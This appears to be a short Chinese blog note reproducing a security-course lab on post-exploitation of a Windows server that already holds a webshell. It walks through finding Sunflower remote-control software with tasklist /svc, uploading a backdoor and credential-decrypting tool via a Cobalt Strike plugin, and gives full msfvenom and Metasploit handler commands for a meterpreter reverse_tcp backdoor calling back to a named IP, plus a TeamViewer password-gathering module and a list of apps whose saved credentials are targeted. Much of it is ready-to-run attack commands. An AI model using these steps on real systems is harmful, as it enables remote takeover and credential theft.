赞
踩
文章内容复现于小迪安全相关课程
电脑(服务器)装的第三方应用越多,安全隐患越大
为追求真实服务器环境,采用阿里云ECS弹性服务器搭建靶场(windows server2012 + phpstudy)
已有webshell权限,利用探针(查看端口,进程等)知道服务器安装了向日葵服务
tasklist /svc
上传后门,会连会话,这里由于搭建原因忽悠是administrator权限,当做是普通用户权限,且无法正常提权至系统权限
利用CS插件上传向日葵提权工具
上传
执行
机器密文就是验证码,使用Python高版本(大于3.8)执行解谜脚本Sunflower_get_Password-main进行解密。百度云链接
接下来可以使用向日葵远控软件直接连接靶机
后门上线权限必须是管理员权限,低权限用户不能获取
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.130.42 LPORT=3333 -f exe -o msf.exe #生成后门
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 0.0.0.0
- set lport 3333
- run
run post/windows/gather/credentials/teamviewer_passwords
各大浏览器 Xshell Navicat 3389 等
主要是使用cs插件直接进行提取,获取到相关密码
FileZilla Serv-u(漏洞太老了,已经淘汰了) Zend等
后续再补……
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。